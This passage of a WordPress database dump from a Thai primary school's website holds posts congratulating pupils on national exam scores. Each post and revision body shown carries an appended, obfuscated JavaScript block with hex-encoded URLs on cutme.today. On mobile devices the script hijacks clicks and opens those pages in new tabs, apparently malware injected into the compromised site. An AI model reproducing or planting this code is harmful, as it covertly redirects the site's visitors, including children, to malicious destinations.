_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ขอแสดงความชื่นชมยินดีกับนักเรียนทุกคนตลอดจนครูและบุคลากรผู้สอนทุกท่าน ปีการศึกษา 2566 ระดับชั้นประถมศึกษาปีที่ 6 โรงเรียนอนุบาลวัดพระโต มีผลการทดสอบระดับชาติขั้นพื้นฐาน (O-NET) สูงขึ้นทุกรายวิชา','','publish','open','open','','%e0%b8%82%e0%b8%ad%e0%b9%81%e0%b8%aa%e0%b8%94%e0%b8%87%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%99%e0%b8%8a%e0%b8%a1%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%94%e0%b8%b5%e0%b8%81','','','2024-07-29 19:00:19','2024-07-29 12:00:19','',0,'http://watprato.ssk.in.th/?p=140',0,'post','',0),
(141,1,'2024-07-29 19:00:07','2024-07-29 12:00:07','','434328136_122134060850202781_9108992241821579810_n','','inherit','open','closed','','434328136_122134060850202781_9108992241821579810_n','','','2024-07-29 19:00:07','2024-07-29 12:00:07','',140,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/434328136_122134060850202781_9108992241821579810_n.jpg',0,'attachment','image/jpeg',0),
(142,1,'2024-07-29 19:00:17','2024-07-29 12:00:17','<!-- wp:generateblocks/image {\"uniqueId\":\"b136f372\",\"mediaId\":141,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-b136f372\"><img class=\"gb-image gb-image-b136f372\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434328136_122134060850202781_9108992241821579810_n.jpg\" alt=\"\" title=\"434328136_122134060850202781_9108992241821579810_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ขอแสดงความชื่นชมยินดีกับนักเรียนทุกคนตลอดจนครูและบุคลากรผู้สอนทุกท่าน ปีการศึกษา 2566 ระดับชั้นประถมศึกษาปีที่ 6 โรงเรียนอนุบาลวัดพระโต มีผลการทดสอบระดับชาติขั้นพื้นฐาน (O-NET) สูงขึ้นทุกรายวิชา','','inherit','closed','closed','','140-revision-v1','','','2024-07-29 19:00:17','2024-07-29 12:00:17','',140,'http://watprato.ssk.in.th/?p=142',0,'revision','',0),
(147,1,'2024-07-29 19:04:44','2024-07-29 12:04:44','<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับ เด็กหญิงณัฐศิกุล ไชยดะรุณ นักเรียนชั้นประถมศึกษาปีที่ 6/4</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เป็นผู้ที่สอบได้คะแนนเต็ม 100 คะแนน กลุ่มสาระการเรียนรู้คณิตศาสตร์ ครูผู้ฝึกสอน : นางอัจฉราวรรณ ล้อมพรม จากการทดสอบทางการศึกษาระดับชาติขั้นพื้นฐาน (O-NET) ประจำปีการศึกษา 2566</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"04e8b567\",\"mediaId\":148,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-04e8b567\"><img class=\"gb-image gb-image-04e8b567\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434370527_122133137474202781_27711147787463551_n.jpg\" alt=\"\" title=\"434370527_122133137474202781_27711147787463551_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับ เด็กหญิงณัฐศิกุล ไชยดะรุณ นักเรียนชั้นประถมศึกษาปีที่ 6/4 เป็นผู้ที่สอบได้คะแนนเต็ม 100 คะแนน กลุ่มสาระการเรียนรู้คณิตศาสตร์ จากการทดสอบทางการศึกษาระดับชาติขั้นพื้นฐาน (O-NET)','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95-7','','','2024-07-29 19:07:04','2024-07-29 12:07:04','',0,'http://watprato.ssk.in.th/?p=147',0,'post','',0),
(148,1,'2024-07-29 19:04:37','2024-07-29 12:04:37','','434370527_122133137474202781_27711147787463551_n','','inherit','open','closed','','434370527_122133137474202781_27711147787463551_n','','','2024-07-29 19:04:37','2024-07-29 12:04:37','',147,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/434370527_122133137474202781_27711147787463551_n.jpg',0,'attachment','image/jpeg',0),
(149,1,'2024-07-29 19:04:44','2024-07-29 12:04:44','<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับ เด็กหญิงณัฐศิกุล ไชยดะรุณ นักเรียนชั้นประถมศึกษาปีที่ 6/4</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เป็นผู้ที่สอบได้คะแนนเต็ม 100 คะแนน กลุ่มสาระการเรียนรู้คณิตศาสตร์ ครูผู้ฝึกสอน : นางอัจฉราวรรณ ล้อมพรม จากการทดสอบทางการศึกษาระดับชาติขั้นพื้นฐาน (O-NET) ประจำปีการศึกษา 2566</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"04e8b567\",\"mediaId\":148,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-04e8b567\"><img class=\"gb-image gb-image-04e8b567\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434370527_122133137474202781_27711147787463551_n.jpg\" alt=\"\" title=\"434370527_122133137474202781_27711147787463551_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 